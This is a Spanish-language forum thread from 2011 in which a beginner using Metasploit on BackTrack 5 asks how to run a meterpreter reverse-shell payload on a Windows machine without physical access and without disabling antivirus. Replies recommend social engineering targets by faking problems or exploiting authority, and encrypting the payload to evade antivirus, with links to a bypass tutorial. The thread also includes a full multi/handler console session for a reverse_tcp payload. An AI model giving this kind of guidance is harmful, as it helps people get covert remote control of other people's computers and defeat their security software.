elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Pregunta metasploit v3.7.1-release
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Pregunta metasploit v3.7.1-release  (Leído 9,005 veces)
VIPbie

Desconectado Desconectado

Mensajes: 29


Persephane


Ver Perfil
Pregunta metasploit v3.7.1-release
« en: 13 Junio 2011, 20:45 pm »

Hola hola!
Quisiera hacerle unas preguntas relacionadas con el uso de esta herramienta.
Estoy apenas relacionándome con ella, recien tengo BT5. y estoy haciendo  pruebas con mis equipos.
Siguiendo un tutorial,  cree el ejecutable con

set PAYLOAD windows/meterpreter/reverse_tcp

Luego con el Msfconsole: use exploit/multi/handler

y pues le hago todo segun el manual, lo meto en una usb y lo ejecuto en la maquina W. enseguida me dió el control absoluto y puedo hacer lo q desee ahi..

Mi pregunta es: esto se puede hacer esto sin que tenga el acceso fisico a la maquina y sin tener que desactivar el AV?

Gracias x cualquier info.



En línea

Women on the power
WebRipper

Desconectado Desconectado

Mensajes: 16


Ver Perfil
Re: Pregunta metasploit v3.7.1-release
« Respuesta #1 en: 15 Junio 2011, 19:08 pm »

hola, estoy casi en las mismas que vos, no se nada pero si pudieras decirme donde encontrar el tutorial ese que tenes estaria agradecido. Por otra parte te recomiendo que postees en los talleres de hacking que hay por el foro.
En línea

Hakr

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: Pregunta metasploit v3.7.1-release
« Respuesta #2 en: 15 Junio 2011, 19:22 pm »

por supuesto! es mas facil usando algo de Ing. Social, lo mas comun es fingir problemas para incentivar el sentimiento de ayuda depende claro de la relacion que se tenga con las personas, si tenes un status social mas elevado la autoridad seria lo mas sencillo. si preferis la manera dura de hacer las cosas les recomiendo leer este tutorial muy extensivo y buenisimo de los creadores de metasploit => http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training el unico problema es que esta en ingles, pero aun asi se aprende muchisimo.

deberias investigar a lo sumo toda la informacion que podas recopilar sobre la maquina victima para asi tener alguna idea de como explotar el sistema, aunque recorda que el sistema mas vulnerable es el humano, suerte! no te olvides de cifrar el payload para que sea indetectable a los antivirus.
En línea

VIPbie

Desconectado Desconectado

Mensajes: 29


Persephane


Ver Perfil
Re: Pregunta metasploit v3.7.1-release
« Respuesta #3 en: 17 Junio 2011, 04:14 am »

Uy espera ahí Hakr , como se cifra el payload para que sea indetectable a los antivirus?? eso sí no lo sabía!

Citar
no se nada pero si pudieras decirme donde encontrar el tutorial ese que tenes estaria agradecido.
WebRipper, cuando dije: 'según el manual' me refería a lo que leí en muchísimos manuales que he encontrado tanto en youtube como en paginas especializadas, he seguido al pie de la letra, he recogido una recopilación de posts, videos y cosas; sobre todo estoy leyendo mucho y tratando de comprender muchas cosas, es complejo pero me encanta!
En línea

Women on the power
VIPbie

Desconectado Desconectado

Mensajes: 29


Persephane


Ver Perfil
Re: Pregunta metasploit v3.7.1-release
« Respuesta #4 en: 17 Junio 2011, 07:18 am »

Hay otra cosa que quisiera saber...
Estoy haciendo unas pruebas despues de usar el nmap. Cuando me sale lo siguiente, ¿qué significa exactamente?
Handler failed to bind to...xxx.xxx.xxx.xxx
¿Qué es lo que está fallando ahí?
En línea

Women on the power
Hakr

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: Pregunta metasploit v3.7.1-release
« Respuesta #5 en: 20 Junio 2011, 04:03 am »

que raro, podrias poner una toma del scan a ver que es lo que pasa? podrias revisar si tienes winpcap instalado o si tienes bien configurado las opciones del nmap.
En línea

VIPbie

Desconectado Desconectado

Mensajes: 29


Persephane


Ver Perfil
Re: Pregunta metasploit v3.7.1-release
« Respuesta #6 en: 24 Junio 2011, 06:38 am »

Estoy haciendo pruebas en mis maquinas y ....miren, la cosa va por aquí:

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set EndOnSession false
EndOnSession => false
msf exploit(handler) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(handler) > set RPORT 4244
RPORT => 4244
msf exploit(handler) > exploit


  • Started reverse handler on 192.168.0.5:5555
  • Starting the payload handler...

Y ahí se queda...
En los tutoriales que he visto, arroja enseguida una conexión....
¿Que no esto teniendo en cuenta?
En línea

Women on the power
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: Pregunta metasploit v3.7.1-release
« Respuesta #7 en: 24 Junio 2011, 11:36 am »

Podría ser el firewall o router?

en realidad no sé
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Hakr

Desconectado Desconectado

Mensajes: 14


Ver Perfil
Re: Pregunta metasploit v3.7.1-release
« Respuesta #8 en: 25 Junio 2011, 21:32 pm »

VIPbie que tipo de vulnerabilidad estas atacando? estas atacando a una maquina como "Client-Side" o directamente sin la interaccion del cliente?

aqui esta la info de como pasar los antivirus => http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass
En línea

VIPbie

Desconectado Desconectado

Mensajes: 29


Persephane


Ver Perfil
Re: Pregunta metasploit v3.7.1-release
« Respuesta #9 en: 27 Junio 2011, 04:28 am »

Hakr, ya estoy mirando como pasar los AV's es posible que sea eso. Voy a  ver que resultados me siguen dando esas pruebas. gracias.
En línea

Women on the power
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Release The Passion
Diseño Gráfico
+ enrique ZP 5 2,934 Último mensaje 9 Junio 2006, 11:08 am
por + enrique ZP
[Metasploit] Usar Keylogger del Metasploit
Hacking
Shell Root 5 18,003 Último mensaje 23 Abril 2011, 20:59 pm
por Edu
pregunta sobr metasploit y caducidad de exploits...
Bugs y Exploits
rulovive 5 5,339 Último mensaje 4 Junio 2011, 02:16 am
por rulovive
Pregunta sobre metasploit
Hacking
Bomb-P 3 3,313 Último mensaje 5 Noviembre 2012, 01:24 am
por dantemc
Pregunta sobre Metasploit
Hacking
14K 3 4,137 Último mensaje 30 Enero 2014, 12:26 pm
por adastra
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines